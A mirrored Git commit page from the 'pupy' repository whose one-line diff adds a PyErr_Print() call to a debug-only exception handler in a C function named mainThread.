mirror of https://github.com/n1nj4sec/pupy.git
Leave PyErr_Print
This commit is contained in:
parent
91bc695888
commit
6b4c39d870
|
@ -170,6 +170,7 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
|
|||
PyObject *ptype, *pvalue, *ptraceback;
|
||||
PyErr_Fetch(&ptype, &pvalue, &ptraceback);
|
||||
dprint("SEQ %d EXCEPTION: %s\n", i, PyString_AsString(pvalue));
|
||||
PyErr_Print();
|
||||
#endif
|
||||
rc = 255;
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue